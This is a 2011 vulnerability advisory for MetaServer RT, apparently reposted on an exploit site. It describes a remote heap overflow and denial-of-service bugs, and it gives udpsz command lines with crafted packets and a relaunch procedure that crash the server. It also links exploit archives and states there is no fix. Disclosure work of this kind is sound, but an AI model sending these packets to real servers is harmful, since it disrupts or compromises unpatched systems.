MetaServer RT <= 3.2.1.450 Multiple Vulnerabilities
2011-09-21 17:40:20#######################################################################
Luigi Auriemma
Application: MetaServer RT
http://www.traderssoft.com/ts/msrt/
Versions: <= 3.2.1.450
Platforms: Windows
Bugs: A] heap overflow
B] various Denials of Service
Exploitation: remote
Date: 19 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x
(eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds
that are not supported originally."
#######################################################################
=======
2) Bugs
=======
The program listens on ports 2189, 2192 and 2194.
----------------
A] heap overflow
----------------
Through an interrupted connection with multiple packets on port 2189
and a subsequent reconnection it's possible to cause a heap overflow
and the relative write4.
Both the "MESSA" and "ROSCO" commands can be used.
-----------------------------
B] various Denials of Service
-----------------------------
Various invalid memory accesses and freezing of the program.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17879.zip
A]
udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff
stop after at least 50 dots and relaunch the command again till the
crashing of the server during a memcpy.
B]
udpsz -b 0x80 -T SERVER 2194 1000
udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
...others...
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.